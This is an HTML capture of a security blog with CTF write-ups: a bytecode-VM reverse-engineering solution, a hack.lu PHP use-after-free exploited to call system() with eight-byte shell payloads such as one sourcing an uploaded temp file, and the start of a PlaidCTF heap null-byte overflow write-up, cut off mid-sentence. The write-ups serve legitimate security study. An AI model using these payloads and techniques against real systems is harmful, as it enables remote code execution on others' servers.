<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">DATA_IP</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span><span class="p">(</span> <span class="nb">true</span> <span class="p">);</span>
</code></pre></div></div>
<p><strong>All the <code class="highlighter-rouge"><</code> comparisons are compilation artifacts</strong>, the original
code probably had a <code class="highlighter-rouge">switch</code>/<code class="highlighter-rouge">case</code> and the compiler decided to
implement some sort of binary balanced tree to reduce the number of
comparisons needed for each <code class="highlighter-rouge">case</code>. We can safely remove them since
the <code class="highlighter-rouge">==</code> comparisons are sufficient.</p>
<p>We also notice that some of the functions we know about (eg:
<code class="highlighter-rouge">do_mov_aX_bX</code>) don’t seem to take the right numbers of
arguments. It’s hard for the decompiler to guess those in all
circumstances but we can help! <code class="highlighter-rouge">right click > Edit Function Signature</code>
and we can set the prototype we wish for all those functions.</p>
<p><strong>With those two things everything looks much cleaner:</strong></p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">do</span> <span class="p">{</span>
<span class="n">param_a</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)];</span>
<span class="n">param_b</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)];</span>
<span class="n">op</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[</span><span class="n">DATA_IP</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x789abcde</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_cmp_ax_bx</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x6789abcd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jmp_a</span><span class="p">((</span><span class="n">param_a</span> <span class="o">+</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x56789abc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jz_a</span><span class="p">((</span><span class="n">param_a</span> <span class="o">+</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x456789ab</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_add_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x3456789a</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_xor_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x23456789</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_ax_b</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x12345678</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x10fedcbb</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_sub_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x210fedcc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jnz_a</span><span class="p">((</span><span class="n">param_a</span> <span class="o">+</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x3210fedd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_aX_pow_0x10001_mod_bX</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x43210fee</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_DATA_ax</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x543210ff</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// WARNING: Subroutine does not return</span>
<span class="n">exit</span><span class="p">(</span><span class="n">DAT_0010506c</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x76543211</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_rol_ax_b</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x65432110</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_ror_ax_b</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DATA_IP</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="nb">true</span><span class="p">);</span>
</code></pre></div></div>
<p>Much more readable already !</p>
<p><strong>A couple things we learned from this:</strong></p>
<ul>
<li><code class="highlighter-rouge">DAT_0010506c</code> is the value with which the program will exit,
which means that <code class="highlighter-rouge">do_mov_DAT_0010506c_aX</code> can be renamed to
<code class="highlighter-rouge">do_mov_DAT_EXIT_aX</code> or <code class="highlighter-rouge">do_ldexit_aX</code>.</li>
<li>We now have a mapping between “instruction numbers” and functionality.</li>
<li>It looks like instructions are encoded on <code class="highlighter-rouge">3 * 4bytes</code> in <code class="highlighter-rouge">local_data</code>.</li>
</ul>
<h2 id="getting-the-code">Getting the code</h2>
<p>At this point we could either attach gdb and set a breakpoint when we know
<code class="highlighter-rouge">local_data</code> has been initialized and dump the instructions like that.</p>
<p>Or read the RTFM (rest of fucking main) and learn that it’s being
loaded from global memory, relevant code;</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">puVar4</span> <span class="o">=</span> <span class="o">&</span><span class="n">DAT_00102020</span><span class="p">;</span>
<span class="n">puVar5</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">lVar3</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">lVar3</span> <span class="o">+=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="o">*</span><span class="n">puVar5</span> <span class="o">=</span> <span class="o">*</span><span class="n">puVar4</span><span class="p">;</span>
<span class="n">puVar4</span> <span class="o">=</span> <span class="n">puVar4</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">puVar5</span> <span class="o">=</span> <span class="n">puVar5</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Either way we find the code and we can start writing a quick
dis-assembler for the operations we now about:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="n">DATA_CODE</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span>
<span class="s">"896745230400000003000000cdab8967040000000000000012f0debcff030000"</span>
<span class="s">"0000000001efcdab000000000000000089674523050000000100010089674523"</span>
<span class="s">"00010000fa20140389674523000200002d74c77789674523010100006bda742b"</span>
<span class="s">"89674523010200002de3617d8967452302010000bf8286638967452302020000"</span>
<span class="s">"19bc4d7b896745230301000021d7415989674523030200005f6ec26289674523"</span>
<span class="s">"04010000bb41ed5c8967452304020000f79364682301efcd1000000000020000"</span>
<span class="s">"debc9a7810000000000100003412f0de02000000000000002301efcd11000000"</span>
<span class="s">"01020000debc9a7811000000010100003412f0de02000000000000002301efcd"</span>
<span class="s">"1200000002020000debc9a7812000000020100003412f0de0200000000000000"</span>
<span class="s">"2301efcd1300000003020000debc9a7813000000030100003412f0de02000000"</span>
<span class="s">"000000002301efcd1400000004020000debc9a7814000000040100003412f0de"</span>
<span class="s">"020000000000000089674523ff03000001000000cdab89670200000000000000"</span>
<span class="p">)</span>
<span class="k">def</span> <span class="nf">arg</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="s">"""Represent a direct argument."""</span>
<span class="k">return</span> <span class="s">"</span><span class="si">%#</span><span class="s">x"</span> <span class="o">%</span> <span class="n">x</span>
<span class="k">def</span> <span class="nf">argX</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="s">"""Represent a de-referenced argument."""</span>
<span class="k">return</span> <span class="s">"[</span><span class="si">%#</span><span class="s">x]"</span> <span class="o">%</span> <span class="n">x</span>
<span class="k">def</span> <span class="nf">noarg</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="s">"""Represent the absence of argument."""</span>
<span class="k">return</span> <span class="s">""</span>
<span class="n">OP_MAP</span> <span class="o">=</span> <span class="p">{</span>
<span class="mh">0x789abcde</span><span class="p">:</span> <span class="p">(</span><span class="s">"cmp"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="mh">0x6789abcd</span><span class="p">:</span> <span class="p">(</span><span class="s">"jmp"</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="mh">0x56789abc</span><span class="p">:</span> <span class="p">(</span><span class="s">"jz"</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="mh">0x456789ab</span><span class="p">:</span> <span class="p">(</span><span class="s">"add"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="mh">0x3456789a</span><span class="p">:</span> <span class="p">(</span><span class="s">"xor"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="mh">0x23456789</span><span class="p">:</span> <span class="p">(</span><span class="s">"mov"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">arg</span><span class="p">),</span>
<span class="mh">0x12345678</span><span class="p">:</span> <span class="p">(</span><span class="s">"mov"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x10fedcbb</span><span class="p">:</span> <span class="p">(</span><span class="s">"sub"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x210fedcc</span><span class="p">:</span> <span class="p">(</span><span class="s">"jnz"</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x3210fedd</span><span class="p">:</span> <span class="p">(</span><span class="s">"powmod"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x43210fee</span><span class="p">:</span> <span class="p">(</span><span class="s">"ldexit"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x543210ff</span><span class="p">:</span> <span class="p">(</span><span class="s">"exit"</span><span class="p">,</span> <span class="n">noarg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x76543211</span><span class="p">:</span> <span class="p">(</span><span class="s">"rol"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">arg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x65432110</span><span class="p">:</span> <span class="p">(</span><span class="s">"ror"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">arg</span><span class="p">),</span>
<span class="p">}</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
<span class="c1"># Loop over DATA_CODE in chunks of 3*4 bytes because we will load
</span> <span class="c1"># the op and the two args which are four bytes each.
</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">ci</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">DATA_CODE</span><span class="p">),</span> <span class="mi">3</span><span class="o">*</span><span class="mi">4</span><span class="p">)):</span>
<span class="n">op</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">"iii"</span><span class="p">,</span> <span class="n">DATA_CODE</span><span class="p">[</span><span class="n">ci</span><span class="p">:</span><span class="n">ci</span><span class="o">+</span><span class="mi">3</span><span class="o">*</span><span class="mi">4</span><span class="p">])</span>
<span class="n">op</span><span class="p">,</span> <span class="n">rep_a</span><span class="p">,</span> <span class="n">rep_b</span> <span class="o">=</span> <span class="n">OP_MAP</span><span class="p">[</span><span class="n">op</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="si">%2</span><span class="s">d: </span><span class="si">%8</span><span class="s">s </span><span class="si">%8</span><span class="s">s </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">op</span><span class="p">,</span> <span class="n">rep_a</span><span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="n">rep_b</span><span class="p">(</span><span class="n">b</span><span class="p">)))</span>
</code></pre></div></div>
<p>This program when run gives us a nice idea of what we are looking at.</p>
<h2 id="understanding-the-code">Understanding the code</h2>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Projects/ctf/rtfm$ ./writeup.py
0: mov [0x4] 0x3
1: jmp 0x4
2: ldexit [0x3ff]
3: exit
4: mov [0x5] 0x10001
5: mov [0x100] 0x31420fa
6: mov [0x200] 0x77c7742d
7: mov [0x101] 0x2b74da6b
8: mov [0x201] 0x7d61e32d
9: mov [0x102] 0x638682bf
10: mov [0x202] 0x7b4dbc19
11: mov [0x103] 0x5941d721
12: mov [0x203] 0x62c26e5f
13: mov [0x104] 0x5ced41bb
14: mov [0x204] 0x686493f7
15: powmod [0x10] [0x200]
16: cmp [0x10] [0x100]
17: jnz 0x2
18: powmod [0x11] [0x201]
19: cmp [0x11] [0x101]
20: jnz 0x2
21: powmod [0x12] [0x202]
22: cmp [0x12] [0x102]
23: jnz 0x2
24: powmod [0x13] [0x203]
25: cmp [0x13] [0x103]
26: jnz 0x2
27: powmod [0x14] [0x204]
28: cmp [0x14] [0x104]
29: jnz 0x2
30: mov [0x3ff] 0x1
31: jmp 0x2
</code></pre></div></div>
<p>Reading this it looks like we always end up jumping to <code class="highlighter-rouge">0x2</code> which
<code class="highlighter-rouge">ldexit [0x3ff]</code> and then <code class="highlighter-rouge">exit</code> with that value.</p>
<p>Since we still don’t know where we’re going to get the flag the best
we can do is try to exit with a non-zero value. (Since when we input
garbage as a password the program exits with status code 0.)</p>
<p>The only way to do that is on line <code class="highlighter-rouge">30:</code> when <code class="highlighter-rouge">0x1</code> is loaded into
<code class="highlighter-rouge">[0x3ff]</code> so the goal becomes to get there.</p>
<p>To do so we need to successfully avoid all the <code class="highlighter-rouge">jnz</code> before that.</p>
<p><strong>Re-ordering the code for clarity we get:</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 5: mov [0x100] 0x31420fa
6: mov [0x200] 0x77c7742d
15: powmod [0x10] [0x200]
16: cmp [0x10] [0x100]
17: jnz 0x2
7: mov [0x101] 0x2b74da6b
8: mov [0x201] 0x7d61e32d
18: powmod [0x11] [0x201]
19: cmp [0x11] [0x101]
20: jnz 0x2
9: mov [0x102] 0x638682bf
10: mov [0x202] 0x7b4dbc19
21: powmod [0x12] [0x202]
22: cmp [0x12] [0x102]
23: jnz 0x2
11: mov [0x103] 0x5941d721
12: mov [0x203] 0x62c26e5f
24: powmod [0x13] [0x203]
25: cmp [0x13] [0x103]
26: jnz 0x2
13: mov [0x104] 0x5ced41bb
14: mov [0x204] 0x686493f7
27: powmod [0x14] [0x204]
28: cmp [0x14] [0x104]
29: jnz 0x2
</code></pre></div></div>
<p>We know that <code class="highlighter-rouge">powmod</code> is <code class="highlighter-rouge">a ** 0x10001 % b</code> so this gives us:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x031420fa == [0x10] ** 0x10001 % 0x77c7742d
0x2b74da6b == [0x11] ** 0x10001 % 0x7d61e32d
0x638682bf == [0x12] ** 0x10001 % 0x7b4dbc19
0x5941d721 == [0x13] ** 0x10001 % 0x62c26e5f
0x5ced41bb == [0x14] ** 0x10001 % 0x686493f7
</code></pre></div></div>
<p>At this point I’m starting to assume that <code class="highlighter-rouge">0x10-0x14</code> will contain our
input in some form. So let’s solve these equations and see what gives.</p>
<p><em>Wait.</em> I’m <strong>bad</strong> at math.</p>
<p>https://www.wolframalpha.com/</p>
<p>But it doesn’t understand python. Rewrite everything to human-ish-speak.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>x ^ 65537 = 51650810 mod 2009560109
x ^ 65537 = 729078379 mod 2103567149
x ^ 65537 = 1669759679 mod 2068691993
x ^ 65537 = 1497487137 mod 1656909407
x ^ 65537 = 1559052731 mod 1751421943
</code></pre></div></div>
<p>Copy pasting the above (line by line) in
<a href="https://www.wolframalpha.com/">wolfram</a> we get back:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>x congruent 1936287603 (mod 2009560109)
x congruent 1701279355 (mod 2103567149)
x congruent 1447900004 (mod 2068691993)
x congruent 1601401973 (mod 1656909407)
x congruent 1717969277 (mod 1751421943)
</code></pre></div></div>
<p>Let’s see what that means if that was part of a password:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">>>></span> <span class="n">results</span> <span class="o">=</span> <span class="p">[</span><span class="mi">1936287603</span><span class="p">,</span> <span class="mi">1701279355</span><span class="p">,</span> <span class="mi">1447900004</span><span class="p">,</span> <span class="mi">1601401973</span><span class="p">,</span> <span class="mi">1717969277</span><span class="p">]</span>
<span class="o">>>></span> <span class="k">print</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"iiiii"</span><span class="p">,</span> <span class="o">*</span><span class="n">results</span><span class="p">))</span>
<span class="n">b</span><span class="s">'sgis{vged3MVuts_}!ff'</span>
</code></pre></div></div>
<p>That almost looks like a flag, but it might be big endian instead of
(default) little endian. Let’s try again:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">>>></span> <span class="k">print</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">">iiiii"</span><span class="p">,</span> <span class="o">*</span><span class="n">results</span><span class="p">))</span>
<span class="n">b</span><span class="s">'sigsegv{VM3d_stuff!}'</span>
</code></pre></div></div>
<p><strong>There we go.</strong></p>
<p>All in all this was an excellent typical reverse engineering challenge
to practice understanding ctf-style bytecode interpreters.</p>wapiflapiIt’s been a while since I haven’t written anything on here, but I thought I’d do a quick write-up for one of the challenges from RTFM.Eight bytes to get a shell.2015-10-29T00:00:00+00:002015-10-29T00:00:00+00:00https://wapiflapi.github.io/2015/10/29/eight-byte-shell<p>This will be a quick one. Last week was hacklu again. And again it was in the
middle of the week. Nothing they can do about that they say, and I believe them
of course! Point being I didn’t have time to play properly, I only looked at one
challenge. There was one little trick I liked and wanted to share.</p>
<p><strong><em>Petition Builder</em></strong> is a chalenge presenting itself as a website built using
PHP. It’s very simple: a form to submit petitions. A parameter allows to prefil
the text you want to submit, and a quick check shows it gives read access any
file on the system.</p>
<p>Dumping source code and configuration files gives us a better understanding of
the challenge. There is a PHP module that is loaded as a shared object. It has a
function <code class="highlighter-rouge">array_get_hashes</code> that is called from the PHP script.</p>
<p>It took me a (long) while, but I finally figured out where the vulnerability
lay. I’ll admit I didn’t see it reading the C code at first, which I’m truly
ashamed for. I had to resort to doing tests to notice I was getting garbage
back. From there I fired gdb to see what was up. Turned out some variable in a
loop was always used but only set in one of two cases. Because of how PHP works,
and the fact that this was used to initialize an array, the object was freed
each time. Meaning that the one time it was used without being set it would
cause a <em>use after free</em>. Long story short it was really easy to control the
contents of a <code class="highlighter-rouge">ZVal</code> and gaining control of the execution by hijacking a method
call.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>call [rax] ; controled rax and rdi pointing to 8 controled bytes.
</code></pre></div></div>
<p>Afterwards, the organizers told me they expected us to ROP our way out of
there. But I wasn’t in the mood of checking all of the available gadgets. With a
fairly easy leak and all of PHP and it’s libraries this would have been very
doable but it looked so time consuming! I was lazy.</p>
<p>System was in the GOT so calling it with <code class="highlighter-rouge">call [rax]</code> is easy enough. <code class="highlighter-rouge">rdi</code> also
pointed to controled bytes. I didn’t <em>want to</em> search for anything else.</p>
<p>Getting a shell in 8 bytes is easy: <code class="highlighter-rouge">'sh <&3;'</code>, or whatever fd is used for the
connection. But no, that did not work for apache/php. The developers are smart
enough to set the appropriate <code class="highlighter-rouge">FD_CLOEXEC</code> flags. Well done!</p>
<p>Something more clever was needed. I didn’t think it was possible to craft a file
by appending stuff byte per byte. <code class="highlighter-rouge">'echo a>x;'</code> is one byte too long, and without
the <code class="highlighter-rouge">;</code> (or null byte) the filename would be garbage. I was prety sure the cwd
wouldn’t even be writable.</p>
<p>The next best thing to get our data on the server was relying on PHP. If you
send files using <code class="highlighter-rouge">POST</code> it stores them on disk waiting for them to be needed. A
check of <code class="highlighter-rouge">php.ini</code> confirmed that that they would be stored in the system’s tmp
directory: <code class="highlighter-rouge">/tmp/php2dz5FZ</code> something like this.</p>
<p><strong>Now, <code class="highlighter-rouge">'. /*/*J;'</code> is eight bytes.</strong> It took about 20 tries for php to randomly pick
<code class="highlighter-rouge">'J'</code> as the last letter while I crossed my fingers that nothing else on the remote
system would match <code class="highlighter-rouge">*J</code>; it didn’t on mine.</p>
<p>It took a bit longer for me to realise that they had strict firewalls in place
preventing my PoC from calling home. Just needed to write all output to a known
file and use the website vulnerability to read it.</p>wapiflapiThis will be a quick one. Last week was hacklu again. And again it was in the middle of the week. Nothing they can do about that they say, and I believe them of course! Point being I didn’t have time to play properly, I only looked at one challenge. There was one little trick I liked and wanted to share.Visualizing a single null-byte heap overflow exploitation2015-04-22T00:00:00+00:002015-04-22T00:00:00+00:00https://wapiflapi.github.io/2015/04/22/single-null-byte-heap-overflow<p>When Phantasmal Phantasmagoria wrote <a href="http://packetstorm.sigterm.no/papers/attack/MallocMaleficarum.txt"><em>The Malloc Malleficarum</em></a> back in 2005
he exposed several ways of gaining control of an exploitation through corruption
of the internal state of the libc memory allocator. Ten years later people are
still exploring the possibilities offered by such complex data structures. In
this article I will present how I solved a <a href="http://github.com/ctfs/write-ups-2015/tree/master/plaidctf-2015/pwnable/plaiddb">challenge</a> from Plaid CTF 2015
and the <a href="http://github.com/wapiflapi/villoc">tool</a> I wrote in the process.</p>
<p>Phantasmal’s paper addressed the patches by libc developers to address previous
exploitation techniques. Some of the insights he presented are still relevant
and people continue go further but new techniques emerged. Project Zero gave a
good example of this with <a href="http://googleprojectzero.blogspot.fr/2014/08/the-poisoned-nul-byte-2014-edition.html"><em>The Poisoned NUL Byte</em></a> which they presented in
2014.</p>
<h1 id="quick-fuzzing-of-the-target-reveals-some-memory-errors">Quick fuzzing of the target reveals some memory errors</h1>
<p>After reverse engineering most of the target we had a pretty good understanding
of what we were up against. A basic main loop prompting the user and yielding
control to a different function for each valid user command:</p>
<ul>
<li><code class="highlighter-rouge">do_get</code>, <code class="highlighter-rouge">do_put</code>, <code class="highlighter-rouge">do_del</code>, <code class="highlighter-rouge">do_dump</code></li>
</ul>
<p>Those are pretty explicit, by looking at what they are doing we can easily
figure out what they are working on. We already knew the application had to be
storing key value pairs because that’s what the user interface is all about.</p>
<p>These are stored in a binary tree, the <code class="highlighter-rouge">node</code> structure looks like this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000 key dq ; char *
00000008 datasz dq ; long
00000010 val dq ; char *
00000018 left dq ; node *
00000020 right dq ; node *
00000028 parent dq ; node *
00000030 is_leaf dq ; bool
</code></pre></div></div>
<p>Everything is stored on the heap using <code class="highlighter-rouge">malloc</code>, <code class="highlighter-rouge">realloc</code> and <code class="highlighter-rouge">free</code>, we
already see where this is going: a typical heap overflow challenge. As we didn’t
notice any obvious UAFs or buffer overflows during our initial recon we decided
to write a very simple fuzzer. Ten lines of python trying random operations. We
maintained a set of about a dozen keys from which we picked at random with of
course the possibility to replace existing keys with new ones from time to time.</p>
<p>Running the <strong>fuzzer with valgrind</strong> immediately exposed memory errors. Looking
at the faulty instruction it was <strong>immediately obvious where the bug lay</strong>. The
function used to read a key from stdin doubles the size of its internal buffer
using <code class="highlighter-rouge">realloc</code> when it doesn’t have enough space but fails to check this when
adding the final null byte. <strong>This causes a one (null) byte overflow on the
heap.</strong></p>
<p>We adapted our fuzzer so it would run into this case a lot more in the hope of
crashing the application instead of just generating valgrind warnings. The
simple change consists in picking key sizes that would cause this overflow:</p>
<p><code class="highlighter-rouge">(sz + 8) % 16 == 0, x >= 24</code></p>
<p>This new fuzzer crashes the application in less than a couple seconds. Most
often because of an abort due to malloc’s integrity checks, sometimes because of
a segfault when the allocator is reading it’s internal data structures. We are
getting somewhere.</p>
<h1 id="we-need-better-visualization-tools">We need better visualization tools</h1>
<p>Last time I played with the heap for exploitation was when I wanted a shell on
<a href="/2014/04/30/getting-a-shell-on-fruits-bkpctf-2014/">fruits</a>. Basically I spent a couple hours badly drawing schematics of the
heap on pieces of paper. This time I decided to invest in writing a tool that
would do that for me. <a href="http://github.com/wapiflapi/villoc">Villoc</a> is a python script that parses the output of
ltrace and writes a static html file that’s a lot easier to read than my sketchy
drawings. Also several people can look at the same rendering which is pretty
useful.</p>
<p>If we open up some of our test cases we can easily figure out what is
happening. We pick a promising one, it aborted with the following error:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*** Error in `./datastore_7e64104f876f0aa3f8330a409d9b9924.elf':
free(): invalid pointer: 0x00005555557582a0 ***
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/fuzed_crash.html"><img src="/public/res/single-null-byte-heap-overflow/fuzed_crash.png" alt="villoc rendering of a crash" /></a>
This is the lower-right part of <a href="/public/res/single-null-byte-heap-overflow/fuzed_crash.html">the full rendering here</a>.</p>
<p>Villoc shows the state of the heap after each function call that changes it. An
important thing to note is that the blocks represented by villoc are memory
chunks <strong>including the malloc overhead</strong> whereas the values given by ltrace and
shown between each state are those seen by the user. This is also true for block
sizes: the first value is the real block size, the one enclosed in parenthesis
is the one the user asked for.</p>
<p>The green block at <code class="highlighter-rouge">0x555555758218</code> is a key, it was reallocated several
times before the timeframe shown in this screenshot. This is where our overflow
occurs, the final null byte of this key is in fact written in the first byte of
the red block at <code class="highlighter-rouge">0x555555758298</code> that was already allocated. The red block
